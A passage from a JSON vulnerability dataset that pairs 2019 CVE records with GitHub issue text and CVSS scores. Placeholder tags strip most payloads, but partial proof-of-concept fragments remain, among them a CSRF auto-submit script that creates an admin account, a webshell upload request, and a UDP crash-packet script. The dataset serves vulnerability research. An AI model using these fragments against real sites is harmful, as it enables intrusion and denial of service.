        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9002",
        "Issue_Url_old": "https://github.com/mikelbring/tinyissue/issues/237",
        "Issue_Url_new": "https://github.com/mikelbring/tinyissue/issues/237",
        "Repo_new": "mikelbring/tinyissue",
        "Issue_Created_At": "2019-02-20T01:56:44Z",
        "description": "There is a security problem that can getshell. problem file at FILETAG line NUMBERTAG config_file = str_replace('localhost', $_POST FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9004",
        "Issue_Url_old": "https://github.com/eclipse/wakaama/issues/425",
        "Issue_Url_new": "https://github.com/eclipse/wakaama/issues/425",
        "Repo_new": "eclipse/wakaama",
        "Issue_Created_At": "2019-02-18T16:50:03Z",
        "description": "Memory leak while processing crafted packet. Wakaama LWM2M server incorrectly handles incoming packets leading to a memory leak. Processing of the single crafted packet leads to leaking (wasting NUMBERTAG bytes of memory. This can lead to stopping of the LWM2M server after exhausting all available memory. Depending on server configuration and isolation of services, this can stop also other processes on the same server. Proposed CVSS NUMBERTAG Score: On systems with modern memory protection and isolation of services NUMBERTAG medium) PATHTAG On systems with lower memory protection and no isolation of services NUMBERTAG high) PATHTAG Reproduction NUMBERTAG Wakaama must be compiled with Leak Sanitizer (or other similar tool) by setting compilation flag: C_FLAGS = fsanitize=address NUMBERTAG Run Wakaama server as: lwm2mserver NUMBERTAG l NUMBERTAG Run following Python2 script (running multiple times will show larger leak): import sys import socket WAKAAMA_PAYLOAD NUMBERTAG e6e2e2e NUMBERTAG b NUMBERTAG out_data = APITAG s = APITAG APITAG ) s.sendto(out_data, APITAG APITAG Execution of the script: python2 wakaama_test.py dst_ip dst_port (where: dst_ip and dst_port are IP and port of tested Wakaama server) e.g.: sudo python wakaama_test.py APITAG NUMBERTAG Close the lwm2mserver to get report from Leak Sanitizer NUMBERTAG bytes received from NUMBERTAG E6 E2 E2 E NUMBERTAG B NUMBERTAG D......g.rd. ^C APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4fa NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG f1df in lwm2m_malloc ( PATHTAG NUMBERTAG ad6 in coap_add_multi_option ( PATHTAG NUMBERTAG f in coap_parse_message ( PATHTAG NUMBERTAG aac in lwm2m_handle_packet ( PATHTAG NUMBERTAG e2 in main ( PATHTAG NUMBERTAG f4fa NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9015",
        "Issue_Url_old": "https://github.com/yangsuda/mopcms/issues/1",
        "Issue_Url_new": "https://github.com/yangsuda/mopcms/issues/1",
        "Repo_new": "yangsuda/mopcms",
        "Issue_Created_At": "2019-02-22T05:58:38Z",
        "description": "There is a Path Traversal vulnerability that can delete unexpected critical files. Vulnerability description A Path Traversal vulnerability was discovered in mopcms which is able to delete unexpected critical files. The exploit point is in the \"column management\" function. The path added to the column is not verified. When the column is deleted by attacker, the corresponding directory is deleted. POC Firstly, create a column and edit the path as './' FILETAG And delete the column FILETAG Result FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9016",
        "Issue_Url_old": "https://github.com/yangsuda/mopcms/issues/2",
        "Issue_Url_new": "https://github.com/yangsuda/mopcms/issues/2",
        "Repo_new": "yangsuda/mopcms",
        "Issue_Created_At": "2019-02-22T06:35:29Z",
        "description": "There is a stored XSS vulnerability. Vulnerability description A xss vulnerability was discovered in mopcms. There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9026",
        "Issue_Url_old": "https://github.com/tbeu/matio/issues/103",
        "Issue_Url_new": "https://github.com/tbeu/matio/issues/103",
        "Repo_new": "tbeu/matio",
        "Issue_Created_At": "2019-02-20T02:24:30Z",
        "description": "some memory corruption problems when the library parse the mat file.. I found several memory corruption problem in the library. More details can be found at here URLTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9048",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/69",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/69",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2019-02-18T07:08:41Z",
        "description": "Four CSRF vulnerabilities in pluck cms NUMBERTAG One: use CSRF vulnerability to delete pictures Vulnerability details: When the administrator logs in, opening the webpage will automatically delete the specified image. Vulnerability url: URLTAG Vulnerability POC: APITAG Two: use the CSRF vulnerability to delete the topic Vulnerability details: When the administrator logs in, opening the web page will automatically delete the specified topic. Vulnerability url: URLTAG Vulnerability POC: APITAG Three: use CSRF vulnerability to remove the module Vulnerability details: When the administrator logs in, open the webpage and the specified module will be deleted automatically. Vulnerability url: URLTAG Vulnerability POC: APITAG Four: use CSRF vulnerability to delete pictures Vulnerability details: When the administrator logs in, opening the web page will automatically delete the specified article. Vulnerability url: URLTAG Vulnerability POC: APITAG Vulnerability suggestions: One: Detect user submissions by referer, token, or verification code. Second: It is best to use the post operation for users to modify and delete.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9050",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/70",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/70",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2019-02-18T07:28:57Z",
        "description": "A file upload vulnerability. Vulnerability details: In the management module page, the installation module uploads a compressed webshell, which can be directly uploaded and decompressed, causing the entire website to crash. Vulnerability url: URLTAG Vulnerability POC: POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"sendfile\"; APITAG Content Type: application/x zip compressed",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-9082",
        "Issue_Url_old": "https://github.com/xiayulei/open_source_bms/issues/33",
        "Issue_Url_new": "https://github.com/suitablecodes/open_source_bms/issues/33",
        "Repo_new": "suitablecodes/open_source_bms",
        "Issue_Created_At": "2019-01-12T03:43:00Z",
        "description": "There is A RCE vulnerability in your system.. The APITAG Command Execution) vulnerability is triggered by a http APITAG executed the command \"whoami\". poc: URLTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9107",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/169",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/169",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-02-14T02:24:30Z",
        "description": "wuzhicms NUMBERTAG imgurl reflected xss vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9108",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/171",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/171",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-02-14T03:12:32Z",
        "description": "wuzhicms NUMBERTAG baidumap reflected xss vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the x or y parameter of APITAG Vulnerability file: APITAG ERRORTAG APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9110",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/170",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/170",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-02-14T03:05:39Z",
        "description": "wuzhicms NUMBERTAG set_iframe reflected xss vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the set_iframe parameter of APITAG Vulnerability file: APITAG ERRORTAG APITAG APITAG Triggered when the user was logged in without verified email address: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9113",
        "Issue_Url_old": "https://github.com/libming/libming/issues/171",
        "Issue_Url_new": "https://github.com/libming/libming/issues/171",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2019-01-02T06:33:17Z",
        "description": "Null pointer dereference in APITAG (decompile.c NUMBERTAG A null pointer dereference was found in function APITAG (decompile.c line NUMBERTAG Details is as below: ERRORTAG poc file : URLTAG Reproduce it using: APITAG credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9115",
        "Issue_Url_old": "https://github.com/irisnet/irisnet-crypto/issues/60",
        "Issue_Url_new": "https://github.com/irisnet/irisnet-crypto/issues/60",
        "Repo_new": "irisnet/irisnet-crypto",
        "Issue_Created_At": "2019-01-16T11:32:46Z",
        "description": "NUMBERTAG In the FILETAG file line NUMBERTAG eval maybe execute malice code\uff0c",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9142",
        "Issue_Url_old": "https://github.com/b3log/symphony/issues/860",
        "Issue_Url_new": "https://github.com/b3log/symphony/issues/860",
        "Repo_new": "b3log/symphony",
        "Issue_Created_At": "2019-01-23T11:12:10Z",
        "description": "Stored Cross Site Scripting(XSS) vulnerability. APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9143",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/711",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/711",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-02-21T11:50:59Z",
        "description": "uncontrolled recursion loop in APITAG Description During our research ,we Observed that an infinite uncontrolled recursion loop, at function APITAG at file image.cpp . It allows an attacker to cause Denial of Service or possibly have unspecified other impact. Command APITAG POC REPRODUCER URLTAG Debug GDB CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9144",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/712",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/712",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-02-21T11:57:14Z",
        "description": "Uncontrolled recursion loop in Exi NUMBERTAG anonymous APITAG ) . Description During our research ,we Observed that an infinite uncontrolled recursion loop, at function APITAG ) located in APITAG . It allows an attacker to cause Denial of Service or possibly have unspecified other impact. Command exi NUMBERTAG b u k p R pr $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9212",
        "Issue_Url_old": "https://github.com/alipay/sofa-hessian/issues/34",
        "Issue_Url_new": "https://github.com/sofastack/sofa-hessian/issues/34",
        "Repo_new": "sofastack/sofa-hessian",
        "Issue_Created_At": "2019-02-24T00:30:09Z",
        "description": "hessian deserialization blacklist bypass . URLTAG url that sofa hessian prevent deserialization by maintaining blacklists. However, the blacklist does not add APITAG and APITAG and there are cases where it continues to be utilized. Take the following poc as an example: URLTAG url",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9226",
        "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/7",
        "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/7",
        "Repo_new": "baigostudio/baigocms",
        "Issue_Created_At": "2019-02-28T08:43:59Z",
        "description": "There is a stored XSS vulnerability. Vulnerability description A xss vulnerability was discovered in APITAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(opt FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9227",
        "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/8",
        "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/8",
        "Repo_new": "baigostudio/baigocms",
        "Issue_Created_At": "2019-02-28T09:49:16Z",
        "description": "There is an Arbitrary Content Injection vulnerability leading to Code Execution . Vulnerability description There is a vulnerability which allows remote attackers to execute arbitrary code. The 'BG_SITE_NAME' parameter which includes malicious code can be written into APITAG poc APITAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9278",
        "Issue_Url_old": "https://github.com/libexif/libexif/issues/26",
        "Issue_Url_new": "https://github.com/libexif/libexif/issues/26",
        "Repo_new": "libexif/libexif",
        "Issue_Created_At": "2019-11-11T13:46:03Z",
        "description": "Relevant commit for CVETAG . As the CVE quotes, > In libexif, there is a possible out of bounds write due to an integer overflow. This could lead to remote escalation of privilege in the media content provider with no additional execution privileges needed. User interaction is needed for exploitation. Do we have a fix for it yet? Relevant bug report at Debian Security Tracker: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9544",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/374",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/374",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-02-28T15:32:28Z",
        "description": "Out of bound write in APITAG Description we observed a Out of bound write occured in function APITAG located in APITAG same be triggered by sending a crafted file to the FILETAG (windows)] [mp NUMBERTAG hls(ubuntu)] binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command in linux mp NUMBERTAG hls hls version NUMBERTAG pmt pid NUMBERTAG ideo pid NUMBERTAG ideo track id NUMBERTAG segment duration NUMBERTAG segment duration threshold NUMBERTAG pcr offset NUMBERTAG index filename APITAG segment filename template stream.mp4 output single file $POC Command in windows mp NUMBERTAG hls.exe hls version NUMBERTAG pmt pid NUMBERTAG ideo pid NUMBERTAG ideo track id NUMBERTAG segment duration NUMBERTAG segment duration threshold NUMBERTAG pcr offset NUMBERTAG index filename APITAG segment filename template stream.mp4 output single file $POC POC [REPRODUCER URLTAG Degub ASAN REPORT ~~~ ASAN report: WARNING: forcing version to NUMBERTAG in order to support single file output APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG d NUMBERTAG at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG bfffd NUMBERTAG sp NUMBERTAG bfffcff8 WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG d NUMBERTAG thread T NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG int) PATHTAG NUMBERTAG in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG aa in APITAG int, APITAG PATHTAG NUMBERTAG e9a in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ee in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG c NUMBERTAG f in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG c NUMBERTAG a1 in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG c2c NUMBERTAG in APITAG int, unsigned long long, bool, bool, APITAG APITAG PATHTAG NUMBERTAG d0 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ee in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG c NUMBERTAG f in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG c NUMBERTAG a1 in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG c2c NUMBERTAG in APITAG int, unsigned long long, bool, bool, APITAG APITAG PATHTAG NUMBERTAG d0 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG a NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~ GDB ~~~ PATHTAG NUMBERTAG APITAG result = APITAG NUMBERTAG if (AP4_FAILED(result)) return result NUMBERTAG construct the new items NUMBERTAG for (unsigned int APITAG i APITAG APITAG item_count NUMBERTAG d NUMBERTAG APITAG size NUMBERTAG c, version NUMBERTAG flags NUMBERTAG stream= APITAG NUMBERTAG bf5 \u2192 APITAG stream= APITAG NUMBERTAG f NUMBERTAG da \u2192 APITAG stream= MENTIONTAG type NUMBERTAG size NUMBERTAG c, size NUMBERTAG c, atom= APITAG NUMBERTAG f NUMBERTAG a \u2192 APITAG stream= MENTIONTAG bytes_available= MENTIONTAG atom= APITAG NUMBERTAG a4cd5 \u2192 APITAG atom_factory= MENTIONTAG stream= MENTIONTAG size NUMBERTAG a NUMBERTAG a4a NUMBERTAG APITAG type NUMBERTAG c, size NUMBERTAG a NUMBERTAG force NUMBERTAG stream= MENTIONTAG atom_factory= APITAG NUMBERTAG a NUMBERTAG e5 \u2192 APITAG size NUMBERTAG a NUMBERTAG is_full NUMBERTAG force NUMBERTAG stream= MENTIONTAG atom_factory= APITAG NUMBERTAG f5bbf \u2192 APITAG stream= MENTIONTAG type NUMBERTAG c, size NUMBERTAG a NUMBERTAG size NUMBERTAG a NUMBERTAG atom= APITAG NUMBERTAG f NUMBERTAG a \u2192 APITAG stream= MENTIONTAG bytes_available= MENTIONTAG atom= APITAG APITAG gef\u27a4 p/d entry_count NUMBERTAG gef\u27a4 p/d item_count NUMBERTAG gef\u27a4 ptype i type = unsigned int gef\u27a4 p/d i NUMBERTAG gef\u27a4 p/d APITAG NUMBERTAG gef\u27a4 ptype APITAG type = class APITAG { public: AP4_UI NUMBERTAG APITAG AP4_UI NUMBERTAG APITAG APITAG APITAG AP4_UI NUMBERTAG gef\u27a4 x APITAG Cannot access memory at address NUMBERTAG gef\u27a4 p APITAG Cannot access memory at address NUMBERTAG gef\u27a4 i r ea NUMBERTAG ec NUMBERTAG b7df NUMBERTAG b7df NUMBERTAG ed NUMBERTAG e NUMBERTAG e NUMBERTAG eb NUMBERTAG ac NUMBERTAG ac NUMBERTAG esp NUMBERTAG bfffe NUMBERTAG bfffe NUMBERTAG ebp NUMBERTAG bfffe NUMBERTAG bfffe NUMBERTAG esi NUMBERTAG c NUMBERTAG c NUMBERTAG edi NUMBERTAG b7df NUMBERTAG b7df NUMBERTAG eip NUMBERTAG ef NUMBERTAG ef NUMBERTAG APITAG eflags NUMBERTAG AF SF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG b ds NUMBERTAG b NUMBERTAG b es NUMBERTAG b NUMBERTAG b fs NUMBERTAG gs NUMBERTAG DEBUG ON WINDOWS ~~~ STACK_TEXT NUMBERTAG be NUMBERTAG d6b2d NUMBERTAG f NUMBERTAG APITAG NUMBERTAG be NUMBERTAG c NUMBERTAG d NUMBERTAG e NUMBERTAG e NUMBERTAG be NUMBERTAG APITAG NUMBERTAG be7bc NUMBERTAG d NUMBERTAG b NUMBERTAG c NUMBERTAG APITAG NUMBERTAG be NUMBERTAG a1fb NUMBERTAG c NUMBERTAG f APITAG NUMBERTAG be NUMBERTAG a NUMBERTAG dd NUMBERTAG c NUMBERTAG APITAG NUMBERTAG be9e NUMBERTAG ae0b NUMBERTAG bea NUMBERTAG bea NUMBERTAG APITAG FAILURE_BUCKET_ID: APITAG BUCKET_ID: APITAG APITAG c NUMBERTAG APITAG violation) FAULTING_SOURCE_FILE: PATHTAG FAILURE_FUNCTION_NAME: APITAG Registers: ea NUMBERTAG f NUMBERTAG eb NUMBERTAG efde NUMBERTAG ec NUMBERTAG f NUMBERTAG ed NUMBERTAG esi NUMBERTAG be NUMBERTAG edi NUMBERTAG be7b0 eip NUMBERTAG d NUMBERTAG f1 esp NUMBERTAG be NUMBERTAG c ebp NUMBERTAG be NUMBERTAG iopl NUMBERTAG nv up ei pl nz na po nc cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG b es NUMBERTAG b fs NUMBERTAG gs NUMBERTAG b efl NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9549",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/17",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/17",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2019-03-02T15:46:46Z",
        "description": "I found a CSRF vulnerability. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG APITAG Write a POST script FILETAG APITAG APITAG APITAG function post(url,fields) { var p APITAG p.action= url; p.method=\"POST\"; p.target=\"_self\"; APITAG = fields; APITAG APITAG } function APITAG { var fields; fields += \" APITAG \"; fields += \" APITAG \"; fields += \" APITAG \"; fields += \" APITAG \"; var url=\" FILETAG PATHTAG post(url,fields); } APITAG = APITAG { APITAG APITAG APITAG APITAG Sent to the site owner, he created an administrator account by opening the link FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9550",
        "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/1",
        "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/1",
        "Repo_new": "shaogongbra/dhcms",
        "Issue_Created_At": "2019-03-02T05:03:09Z",
        "description": "Dhcms Stored XSS APITAG Privilege). Holes for details: APITAG the backstage: URLTAG APITAG form FILETAG APITAG FILETAG and input:\"> APITAG APITAG you can accept cookie information FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-9551",
        "Issue_Url_old": "https://github.com/millken/doyocms/issues/2",
        "Issue_Url_new": "https://github.com/millken/doyocms/issues/2",
        "Repo_new": "millken/doyocms",
        "Issue_Created_At": "2019-03-02T03:44:48Z",
        "description": "Stored XSS APITAG Privilege). Holes for details: APITAG the backstage: FILETAG APITAG article APITAG editor FILETAG APITAG APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-9552",
        "Issue_Url_old": "https://github.com/lmy1342554547/p2pProject/issues/1",
        "Issue_Url_new": "https://github.com/lmy1342554547/p2pproject/issues/1",
        "Repo_new": "lmy1342554547/p2pProject",
        "Issue_Created_At": "2019-03-02T02:56:30Z",
        "description": "APITAG P2P directory traversal vulnerabilities. Holes for details: APITAG P2P directory traversal vulnerabilities\uff0c Directory traversal (arbitrary files download) hole is different from the site directory browsing, the vulnerability is not only can traverse the web under the system files, and you can browse or download the files in the system, the attack people through directory traversal attacks can access to system files and server configuration files, and so on. In general, they use the server API, standard file permissions. Strictly speaking, directory traversal attack is not a web vulnerability, but web designers design \"holes\". If a web designer to design the web content, does not have the proper access control allows HTTP traversal, the attacker can access restricted directories, and can execute commands outside the web root directory. Vulnerability screenshots\uff1a URL: URLTAG URLTAG URLTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9570",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/11",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/11",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2019-03-05T06:59:56Z",
